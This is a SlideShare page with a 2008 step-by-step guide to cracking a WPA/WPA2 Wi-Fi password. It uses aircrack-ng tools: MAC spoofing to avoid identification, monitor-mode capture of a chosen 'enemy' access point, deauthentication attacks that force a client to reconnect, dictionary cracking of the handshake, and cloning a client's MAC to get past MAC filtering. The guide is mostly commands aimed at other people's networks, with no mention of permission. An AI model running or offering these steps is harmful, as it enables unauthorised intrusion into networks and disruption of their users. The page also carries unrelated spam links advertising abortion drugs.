SlideShare a Scribd company logo
1 of 1
Download to read offline
WPA2/WPA Hack MAC filtered or not
Basics:
Software: BackTrack Remote Exploit V3
Download: http://www.remote-exploit.org
Chipset: ATHEROS (Cisco Aironet 802.11 a/b/g / NEC
WarpStar WL54AG, Netgear WG311T)
Constellation:
- Boot from CD or HD with BT V3
- 64 MB free writeable Space
- 2 Shells (under Xwindows it’s easier (startx))
If XWindows doesn’t work, configure it wirh “xconf” or
„xorgconfig --textmode“
Shortcuts:
- BT = BackTrack
- MAC = MAC Address
- AP = Accesspoint
- CL = Client
- IFC = Interface (here ath0 placeholder)
- FILE = Log file 2 store the packets
- CH = Channel
- DIC = Dictionary File (.dic or .txt)
Foreword:
This Hack is only working with the Brute Force method.
My Core2Duo 3GHz hacks 420 Keys / Sec.
It doesn’t matter WPA or WPA2. For hacking it is the
same. ONLY WPA2 encrypted as TKIP works. AES is
incompatible!
General Conditions:
- Accesspoint with good Signal
- one Client, who is connected to the AP.
- A Dictionary File
Hack it !
1) Wireless Device identification
We want to know how our device is named in the System.
Type „iwconfig“. With Atheros Chipsets the devices calls
always athX.
2) Fake that MAC! (optional)
First, we fake our own MAC address. So nobody can
identify us any more.
ifconfig IFC hw ether 00:11:22:33:44:55
3) Turn on Monitor Mode
To get all the packages we put our device in the
„Promiscuous Mode“
First we kill the monitor mode on the ath0 device and
create a new monitor device over the wifi0 device. After
we created the monitor device, we can use the ath0.
airmon-ng stop ath0 (delete the monitor mode)
airmon-ng start wifi0 (start monitor mode auf ath0)
4) What is online ? (SHELL 1)
Search some AP’s with already connected Clients.
(you can see it in the bottom half of the screen, calls
Stations and Clients)
airodump-ng –w FILE IFC
CTRL – C
5) Choose your enemy (SHELL 1)
Please remember the MAC address of the AP you want to
hack. Remember also the channel number from the AP you
want to hack.
Now we only want to collect the packages on that channel
and we like to store that traffic in a CAP-file.
(DONT USE „--ivs“ Option!!)
airodump-ng –w FILE –c CH --bssid APMAC IFC
6) Waiting for a Handshake ! (SHELL 2)
Ok .. now we can wait for a Handshake. (You can see it in
the ariodump-ng window SHELL 1). The “enemy” don’t feel
anything about. But this can take a long time. You have to
wait for a client-reconnect from which you will get the
handshake. But we can provoke a reconnect form a client.
How can we provoke a reconnect? easy… we tell to the AP
„Hello I am the client , and I want to disconnect.” The real
Client think „Shiiit I am disconnected.. I must reconnect
immediately!“ And we get the handshake we need and we
store it in SHELL1
You can see it in the first line of SHELL1.
So, if you want provoke a reconnect, type more then one
times the fallowing command. (wait 5-20s between)
aireplay-ng -0 1 -a AP_MAC –c CL_MAC IFC
7) Crack the key! (SHELL 1)
Ok … we got the handshake. Let’s crack it! We compare the
stored handshake in the .cap file with the dictionary file.
aircrack-ng -0 –x2 -w DIC FILE.cap
8) Connect to the hacked AP (SHELL2)
With a MAC filtered AP you have to set a trusted MAC
address from a client on your own card.
ifconfig IFC down hw ether CL_MAC (maybe reset IFC first)
and then connect to the AP:
For Mouse Lovers:
wlassistant
For Shell Lovers:
iwconfig IFC essid AP_NAME_SSID mode Managed key
s:KEY_ASCII
ifconfig IFC up
iwpriv IFC authmode 2 (to connect, LED flahing)
dhcpcd IFC (to get a IP Adress)
2008 by Celly

More Related Content

What's hot

Export channel switching_150424
Export channel switching_150424Export channel switching_150424
Export channel switching_150424
Yin Changjian
 
How to configure Extended acl for a network
How to configure Extended acl for a networkHow to configure Extended acl for a network
How to configure Extended acl for a network
tcpipguru
 
Anatomy of a PHP Request ( UTOSC 2010 )
Anatomy of a PHP Request ( UTOSC 2010 )Anatomy of a PHP Request ( UTOSC 2010 )
Anatomy of a PHP Request ( UTOSC 2010 )
Joseph Scott
 
From front-end to the hardware
From front-end to the hardwareFrom front-end to the hardware
From front-end to the hardware
Henri Cavalcante
 
group-j-week11
group-j-week11group-j-week11
group-j-week11
s1140144
 

What's hot (19)

主機自保指南
主機自保指南主機自保指南
主機自保指南
 
Netmiko library
Netmiko libraryNetmiko library
Netmiko library
 
Gyro mouse
Gyro mouseGyro mouse
Gyro mouse
 
Asynchronous swift
Asynchronous swiftAsynchronous swift
Asynchronous swift
 
Ansible ssh y comandos ad-hoc
Ansible ssh y comandos ad-hocAnsible ssh y comandos ad-hoc
Ansible ssh y comandos ad-hoc
 
Export channel switching_150424
Export channel switching_150424Export channel switching_150424
Export channel switching_150424
 
ZeroNights: Automating iOS blackbox security scanning
ZeroNights: Automating iOS blackbox security scanningZeroNights: Automating iOS blackbox security scanning
ZeroNights: Automating iOS blackbox security scanning
 
How to configure Extended acl for a network
How to configure Extended acl for a networkHow to configure Extended acl for a network
How to configure Extended acl for a network
 
NYU hacknight, april 6, 2016
NYU hacknight, april 6, 2016NYU hacknight, april 6, 2016
NYU hacknight, april 6, 2016
 
Sniffing Mach Messages
Sniffing Mach MessagesSniffing Mach Messages
Sniffing Mach Messages
 
Armitage : Art of Exploitation
Armitage : Art of ExploitationArmitage : Art of Exploitation
Armitage : Art of Exploitation
 
An introduction to PHP 5.4
An introduction to PHP 5.4An introduction to PHP 5.4
An introduction to PHP 5.4
 
Hack 01
Hack 01Hack 01
Hack 01
 
Anatomy of a PHP Request ( UTOSC 2010 )
Anatomy of a PHP Request ( UTOSC 2010 )Anatomy of a PHP Request ( UTOSC 2010 )
Anatomy of a PHP Request ( UTOSC 2010 )
 
Php arduino
Php arduinoPhp arduino
Php arduino
 
SSH: Seguranca no Acesso Remoto
SSH: Seguranca no Acesso RemotoSSH: Seguranca no Acesso Remoto
SSH: Seguranca no Acesso Remoto
 
IPv6 in CloudStack Basic Networking
IPv6 in CloudStack Basic NetworkingIPv6 in CloudStack Basic Networking
IPv6 in CloudStack Basic Networking
 
From front-end to the hardware
From front-end to the hardwareFrom front-end to the hardware
From front-end to the hardware
 
group-j-week11
group-j-week11group-j-week11
group-j-week11
 

Similar to Cellys wpa2 hack_en

Figure 3 TCP Session Hijacking Attack victims to execute the mali.pdf
Figure 3 TCP Session Hijacking Attack victims to execute the mali.pdfFigure 3 TCP Session Hijacking Attack victims to execute the mali.pdf
Figure 3 TCP Session Hijacking Attack victims to execute the mali.pdf
orderfabfirki
 
DEF CON 23: Internet of Things: Hacking 14 Devices
DEF CON 23: Internet of Things: Hacking 14 DevicesDEF CON 23: Internet of Things: Hacking 14 Devices
DEF CON 23: Internet of Things: Hacking 14 Devices
Synack
 
Ccna lab manual 640 802
Ccna lab manual 640 802Ccna lab manual 640 802
Ccna lab manual 640 802
manikkan
 
Shellcoding in linux
Shellcoding in linuxShellcoding in linux
Shellcoding in linux
Ajin Abraham
 

Similar to Cellys wpa2 hack_en (20)

Hardwear.io 2018 BLE Security Essentials workshop
Hardwear.io 2018 BLE Security Essentials workshopHardwear.io 2018 BLE Security Essentials workshop
Hardwear.io 2018 BLE Security Essentials workshop
 
Important cisco-chow-commands
Important cisco-chow-commandsImportant cisco-chow-commands
Important cisco-chow-commands
 
Buffer Overflow - Smashing the Stack
Buffer Overflow - Smashing the StackBuffer Overflow - Smashing the Stack
Buffer Overflow - Smashing the Stack
 
Esp8266 wi fi_module_quick_start_guide_v_1.0.4
Esp8266 wi fi_module_quick_start_guide_v_1.0.4Esp8266 wi fi_module_quick_start_guide_v_1.0.4
Esp8266 wi fi_module_quick_start_guide_v_1.0.4
 
#Include os - From bootloader to REST API with the new C++
#Include os - From bootloader to REST API with the new C++#Include os - From bootloader to REST API with the new C++
#Include os - From bootloader to REST API with the new C++
 
Code Red Security
Code Red SecurityCode Red Security
Code Red Security
 
Backtrack Manual Part10
Backtrack Manual Part10Backtrack Manual Part10
Backtrack Manual Part10
 
Wifi cracking
Wifi crackingWifi cracking
Wifi cracking
 
Figure 3 TCP Session Hijacking Attack victims to execute the mali.pdf
Figure 3 TCP Session Hijacking Attack victims to execute the mali.pdfFigure 3 TCP Session Hijacking Attack victims to execute the mali.pdf
Figure 3 TCP Session Hijacking Attack victims to execute the mali.pdf
 
Writing Metasploit Plugins
Writing Metasploit PluginsWriting Metasploit Plugins
Writing Metasploit Plugins
 
Defcon 22-colby-moore-patrick-wardle-synack-drop cam
Defcon 22-colby-moore-patrick-wardle-synack-drop camDefcon 22-colby-moore-patrick-wardle-synack-drop cam
Defcon 22-colby-moore-patrick-wardle-synack-drop cam
 
Dos on 802.11 and other security issues ( Case Study )
Dos on 802.11 and other security issues ( Case Study ) Dos on 802.11 and other security issues ( Case Study )
Dos on 802.11 and other security issues ( Case Study )
 
Buffer overflow – Smashing The Stack
Buffer overflow – Smashing The StackBuffer overflow – Smashing The Stack
Buffer overflow – Smashing The Stack
 
DEF CON 23: Internet of Things: Hacking 14 Devices
DEF CON 23: Internet of Things: Hacking 14 DevicesDEF CON 23: Internet of Things: Hacking 14 Devices
DEF CON 23: Internet of Things: Hacking 14 Devices
 
Ccna lab manual 640 802
Ccna lab manual 640 802Ccna lab manual 640 802
Ccna lab manual 640 802
 
Backtrack Manual Part4
Backtrack Manual Part4Backtrack Manual Part4
Backtrack Manual Part4
 
Shellcoding in linux
Shellcoding in linuxShellcoding in linux
Shellcoding in linux
 
Sigfox + Arduino MKRFOX Workshop
Sigfox + Arduino MKRFOX WorkshopSigfox + Arduino MKRFOX Workshop
Sigfox + Arduino MKRFOX Workshop
 
Davide Berardi - Linux hardening and security measures against Memory corruption
Davide Berardi - Linux hardening and security measures against Memory corruptionDavide Berardi - Linux hardening and security measures against Memory corruption
Davide Berardi - Linux hardening and security measures against Memory corruption
 
managing your network environment
managing your network environmentmanaging your network environment
managing your network environment
 

Recently uploaded

KLINIK BATA Jual obat penggugur kandungan 087776558899 ABORSI JANIN KEHAMILAN...
KLINIK BATA Jual obat penggugur kandungan 087776558899 ABORSI JANIN KEHAMILAN...KLINIK BATA Jual obat penggugur kandungan 087776558899 ABORSI JANIN KEHAMILAN...
KLINIK BATA Jual obat penggugur kandungan 087776558899 ABORSI JANIN KEHAMILAN...
Cara Menggugurkan Kandungan 087776558899
 
February 2024 Recommendations for newsletter
February 2024 Recommendations for newsletterFebruary 2024 Recommendations for newsletter
February 2024 Recommendations for newsletter
ssuserdfec6a
 

Recently uploaded (9)

Emotional Freedom Technique Tapping Points Diagram.pdf
Emotional Freedom Technique Tapping Points Diagram.pdfEmotional Freedom Technique Tapping Points Diagram.pdf
Emotional Freedom Technique Tapping Points Diagram.pdf
 
communication-skills-training-excerpt.pdf
communication-skills-training-excerpt.pdfcommunication-skills-training-excerpt.pdf
communication-skills-training-excerpt.pdf
 
March 2023 Recommendations for newsletter
March 2023 Recommendations for newsletterMarch 2023 Recommendations for newsletter
March 2023 Recommendations for newsletter
 
Exploring Stoic Philosophy From Ancient Wisdom to Modern Relevance.pdf
Exploring Stoic Philosophy From Ancient Wisdom to Modern Relevance.pdfExploring Stoic Philosophy From Ancient Wisdom to Modern Relevance.pdf
Exploring Stoic Philosophy From Ancient Wisdom to Modern Relevance.pdf
 
2023 - Between Philosophy and Practice: Introducing Yoga
2023 - Between Philosophy and Practice: Introducing Yoga2023 - Between Philosophy and Practice: Introducing Yoga
2023 - Between Philosophy and Practice: Introducing Yoga
 
Social Learning Theory presentation.pptx
Social Learning Theory presentation.pptxSocial Learning Theory presentation.pptx
Social Learning Theory presentation.pptx
 
KLINIK BATA Jual obat penggugur kandungan 087776558899 ABORSI JANIN KEHAMILAN...
KLINIK BATA Jual obat penggugur kandungan 087776558899 ABORSI JANIN KEHAMILAN...KLINIK BATA Jual obat penggugur kandungan 087776558899 ABORSI JANIN KEHAMILAN...
KLINIK BATA Jual obat penggugur kandungan 087776558899 ABORSI JANIN KEHAMILAN...
 
SIKP311 Sikolohiyang Pilipino - Ginhawa.pptx
SIKP311 Sikolohiyang Pilipino - Ginhawa.pptxSIKP311 Sikolohiyang Pilipino - Ginhawa.pptx
SIKP311 Sikolohiyang Pilipino - Ginhawa.pptx
 
February 2024 Recommendations for newsletter
February 2024 Recommendations for newsletterFebruary 2024 Recommendations for newsletter
February 2024 Recommendations for newsletter
 

Cellys wpa2 hack_en

  • 1. WPA2/WPA Hack MAC filtered or not Basics: Software: BackTrack Remote Exploit V3 Download: http://www.remote-exploit.org Chipset: ATHEROS (Cisco Aironet 802.11 a/b/g / NEC WarpStar WL54AG, Netgear WG311T) Constellation: - Boot from CD or HD with BT V3 - 64 MB free writeable Space - 2 Shells (under Xwindows it’s easier (startx)) If XWindows doesn’t work, configure it wirh “xconf” or „xorgconfig --textmode“ Shortcuts: - BT = BackTrack - MAC = MAC Address - AP = Accesspoint - CL = Client - IFC = Interface (here ath0 placeholder) - FILE = Log file 2 store the packets - CH = Channel - DIC = Dictionary File (.dic or .txt) Foreword: This Hack is only working with the Brute Force method. My Core2Duo 3GHz hacks 420 Keys / Sec. It doesn’t matter WPA or WPA2. For hacking it is the same. ONLY WPA2 encrypted as TKIP works. AES is incompatible! General Conditions: - Accesspoint with good Signal - one Client, who is connected to the AP. - A Dictionary File Hack it ! 1) Wireless Device identification We want to know how our device is named in the System. Type „iwconfig“. With Atheros Chipsets the devices calls always athX. 2) Fake that MAC! (optional) First, we fake our own MAC address. So nobody can identify us any more. ifconfig IFC hw ether 00:11:22:33:44:55 3) Turn on Monitor Mode To get all the packages we put our device in the „Promiscuous Mode“ First we kill the monitor mode on the ath0 device and create a new monitor device over the wifi0 device. After we created the monitor device, we can use the ath0. airmon-ng stop ath0 (delete the monitor mode) airmon-ng start wifi0 (start monitor mode auf ath0) 4) What is online ? (SHELL 1) Search some AP’s with already connected Clients. (you can see it in the bottom half of the screen, calls Stations and Clients) airodump-ng –w FILE IFC CTRL – C 5) Choose your enemy (SHELL 1) Please remember the MAC address of the AP you want to hack. Remember also the channel number from the AP you want to hack. Now we only want to collect the packages on that channel and we like to store that traffic in a CAP-file. (DONT USE „--ivs“ Option!!) airodump-ng –w FILE –c CH --bssid APMAC IFC 6) Waiting for a Handshake ! (SHELL 2) Ok .. now we can wait for a Handshake. (You can see it in the ariodump-ng window SHELL 1). The “enemy” don’t feel anything about. But this can take a long time. You have to wait for a client-reconnect from which you will get the handshake. But we can provoke a reconnect form a client. How can we provoke a reconnect? easy… we tell to the AP „Hello I am the client , and I want to disconnect.” The real Client think „Shiiit I am disconnected.. I must reconnect immediately!“ And we get the handshake we need and we store it in SHELL1 You can see it in the first line of SHELL1. So, if you want provoke a reconnect, type more then one times the fallowing command. (wait 5-20s between) aireplay-ng -0 1 -a AP_MAC –c CL_MAC IFC 7) Crack the key! (SHELL 1) Ok … we got the handshake. Let’s crack it! We compare the stored handshake in the .cap file with the dictionary file. aircrack-ng -0 –x2 -w DIC FILE.cap 8) Connect to the hacked AP (SHELL2) With a MAC filtered AP you have to set a trusted MAC address from a client on your own card. ifconfig IFC down hw ether CL_MAC (maybe reset IFC first) and then connect to the AP: For Mouse Lovers: wlassistant For Shell Lovers: iwconfig IFC essid AP_NAME_SSID mode Managed key s:KEY_ASCII ifconfig IFC up iwpriv IFC authmode 2 (to connect, LED flahing) dhcpcd IFC (to get a IP Adress) 2008 by Celly